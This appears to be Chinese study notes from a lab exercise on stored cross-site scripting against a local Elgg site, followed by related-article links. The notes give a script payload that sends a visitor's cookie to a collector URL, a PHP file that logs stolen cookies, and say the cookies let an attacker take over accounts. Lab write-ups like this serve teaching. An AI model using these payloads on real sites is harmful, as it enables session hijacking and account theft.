xss學習實驗
xss主體分爲兩類
來自內部:主要利用程序自身的漏洞,構造跨站語句。
來自外部:本身構造xss跨站漏洞頁面,而後誘惑管理員點擊,從而獲取信息php
下面進行實驗樓的實驗
配置DNS :sudo vim /etc/hosts
配置網站文件: sudo vim /etc/apache2/conf.d/lab.confmysql
啓動sql和apache服務
sudo mysqld_safe
sudo service apache2 startsql
登陸網站,在用戶信息編輯界面輸入,紅框內爲得到的cookie
<script>document.write(document.cookie);</script>
apache
可是咱們這是仍然得到的是本身的cookie,咱們不須要本身的cookie,咱們須要在不登陸的狀況下,獲取別人的cookie,這樣咱們就能使用cookie直接登陸別人的帳號。vim
要竊取別人的cookie,首先須要搭建一個能接受cookie的環境,而後經過JavaScript代碼把別人的cookie經過http請求發送到所搭的環境。服務器
修改在用戶信息編輯界面輸入的代碼
<script>document.write('<img src=http://www.xsslabelgg.com/hac...' + escape(document.cookie) + '>');</script>cookie
在網站目錄下搭建一個hack.php文件
sudo vim /var/www/XSS/elgg/hack.phpxss
代碼以下網站
<?php
$cookie = $_GET["c"];
$log = fopen("cookie.txt","a");
fwrite($log,$cookie ."n");
fclose($log);
?>spa
建立一個cookie.txt儲存cookie,而且這個文件要有寫入權限
sudo touch cookie.txt
sudo chmod 777 cookie.txt
刷新以前的用戶編輯界面後,查看cookie.txt文件,發現已經獲取到用戶的cookie
獲取到對方的cookie以後,攻擊者能夠僞造受害者向服務器發送請求。
- 1. XSS學習(一)
- 2. XSS學習
- 3. XSS學習 (一)
- 4. XSS進階三 ——合天網安實驗室學習筆記
- 5. XSS進階一 ——合天網安實驗室學習筆記
- 6. XSS進階二 ——合天網安實驗室學習筆記
- 7. DVWA實驗儲存型XSS
- 8. XSS學習筆記
- 9. DVWA學習之XSS
- 10. XSS學習收集
- 更多相關文章...
- • 您已經學習了 XML Schema,下一步學習什麼呢? - XML Schema 教程
- • 我們已經學習了 SQL,下一步學習什麼呢? - SQL 教程
- • Tomcat學習筆記(史上最全tomcat學習筆記)
- • 適用於PHP初學者的學習線路和建議
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. XSS學習(一)
- 2. XSS學習
- 3. XSS學習 (一)
- 4. XSS進階三 ——合天網安實驗室學習筆記
- 5. XSS進階一 ——合天網安實驗室學習筆記
- 6. XSS進階二 ——合天網安實驗室學習筆記
- 7. DVWA實驗儲存型XSS
- 8. XSS學習筆記
- 9. DVWA學習之XSS
- 10. XSS學習收集